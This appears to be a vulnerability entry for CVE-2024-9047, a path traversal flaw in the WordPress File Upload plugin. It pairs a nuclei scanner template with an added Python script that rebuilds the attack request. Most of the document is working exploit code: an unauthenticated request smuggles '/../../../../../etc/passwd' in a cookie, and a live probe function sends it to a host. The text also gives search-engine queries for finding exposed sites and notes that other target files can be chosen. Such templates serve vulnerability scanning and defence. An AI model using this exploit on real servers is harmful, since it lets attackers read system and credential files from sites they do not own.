The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
PoC code [publicly available]
id: CVE-2024-9047

info:
  name: WordPress File Upload <= 4.24.11 - Arbitrary File Read
  author: s4e-io,S9n3x
  severity: critical
  description: |
    The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
  reference:
    - https://github.com/iSee857/CVE-2024-9047-PoC
    - https://nvd.nist.gov/vuln/detail/cve-2024-9047
    - https://plugins.trac.wordpress.org/changeset/3164449/wp-file-upload
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=cve
    - https://github.com/wy876/POC
    - https://www.usom.gov.tr/bildirim/tr-24-1670
    - https://sploitus.com/exploit?id=3358E6CC-BC63-56E4-A4C4-1F70903C34D5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9047
    cwe-id: CWE-22
    epss-score: 0.93496
    epss-percentile: 0.99812
  metadata:
    max-request: 1
    vendor: nickolas_bossinas
    product: wordpress-file-upload
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/wp-file-upload/"
    fofa-query: body="/wp-content/plugins/wp-file-upload"
    publicwww-query: /wp-content/plugins/wp-file-upload/
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev,vuln

variables:
  file: "{{rand_base(16)}}"
  ticket: "{{rand_base(16)}}"
  upload: "{{rand_base(32)}}"
  upload_more: "{{rand_base(32)}}"
  time: "{{rand_int(1000000000000, 9999999999999)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file={{file}}&ticket={{ticket}}&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_{{upload}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: wp_wpfileupload_{{upload}}={{upload_more}}; wfu_storage_{{file}}=/../../../../../etc/passwd[[name]]; wfu_download_ticket_{{ticket}}={{time}}; wfu_ABSPATH=/;

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "filename=\"passwd")'
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502202b6a0a5db939431c369a1cf8dec5019bee7e2bc2c528d597576475a495bc3fe5022100c33f3712aeaf3303d15f92c9ee490326a44ab027a28082db15077d99e4700837:922c64590222798bb761d5b6d8e72950
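The Python below is an added example, not code from the template authors, the PoC repositories referenced above, or the plugin. It rebuilds the exact request the template sends (same query parameters, same four cookies, fresh random tokens per probe) and re-implements the template's three DSL matchers, so the check can be reproduced or unit-tested without nuclei. The host names used are placeholders; the `[[name]]` suffix on the traversal payload is carried over from the template unchanged, and the `probe()` function is an optional live check that is never called offline.

```python
"""Re-implementation of the CVE-2024-9047 nuclei template as plain Python (added example)."""
import re
import secrets
import string
import urllib.error
import urllib.request
from urllib.parse import urlencode

PLUGIN_PATH = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
# Traversal payload copied from the template's wfu_storage_* cookie; [[name]] is kept verbatim.
DEFAULT_TARGET = "/../../../../../etc/passwd[[name]]"
_ALPHABET = string.ascii_lowercase + string.digits


def rand_base(n):
    """Equivalent of nuclei's rand_base(n): n random [a-z0-9] characters."""
    return "".join(secrets.choice(_ALPHABET) for _ in range(n))


def build_request(host, target=DEFAULT_TARGET, scheme="https"):
    """Return (url, cookie_header) for one probe, mirroring the template's raw request."""
    file_id = rand_base(16)       # {{file}}
    ticket = rand_base(16)        # {{ticket}}
    upload = rand_base(32)        # {{upload}}
    upload_value = rand_base(32)  # {{upload_more}}
    # {{time}}: rand_int(1000000000000, 9999999999999), a 13-digit value
    ticket_time = secrets.randbelow(9_000_000_000_000) + 1_000_000_000_000
    query = urlencode({
        "file": file_id,
        "ticket": ticket,
        "handler": "dboption",
        "session_legacy": "1",
        "dboption_base": "cookies",
        "dboption_useold": "0",
        "wfu_cookie": f"wp_wpfileupload_{upload}",
    })
    cookie = "; ".join([
        f"wp_wpfileupload_{upload}={upload_value}",
        f"wfu_storage_{file_id}={target}",          # attacker-controlled storage path
        f"wfu_download_ticket_{ticket}={ticket_time}",
        "wfu_ABSPATH=/",                            # pins the base directory to filesystem root
    ])
    return f"{scheme}://{host}{PLUGIN_PATH}?{query}", cookie


def check_response(status_code, headers, body):
    """Apply the template's matchers; all three must hold (condition: and)."""
    header_blob = "\r\n".join(f"{k}: {v}" for k, v in headers.items())
    return (
        status_code == 200
        and 'filename="passwd' in header_blob               # contains(header, ...)
        and re.search(r"root:.*:0:0:", body) is not None     # regex('root:.*:0:0:', body)
    )


def probe(host, timeout=10):
    """Optional live check (not exercised offline): True if the matchers fire."""
    url, cookie = build_request(host)
    req = urllib.request.Request(url, headers={"Cookie": cookie, "User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return check_response(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as err:
        body = err.read(65536).decode("utf-8", "replace")
        return check_response(err.code, dict(err.headers), body)


if __name__ == "__main__":
    # Offline demonstration on a constructed response; replace with probe("target.example") for a live test.
    url, cookie = build_request("target.example")
    print(url)
    print("Cookie:", cookie)
    sample_headers = {"Content-Disposition": 'attachment; filename="passwd"'}  # constructed
    sample_body = "root:x:0:0:root:/root:/bin/bash\n"                           # constructed
    print("vulnerable:", check_response(200, sample_headers, sample_body))
```

The matcher deliberately requires the `filename="passwd` header as well as the `root:...:0:0:` body pattern, because a site that merely echoes `/etc/passwd` content in an error page would otherwise produce a false positive; keep all three conditions if you adapt this to another target file.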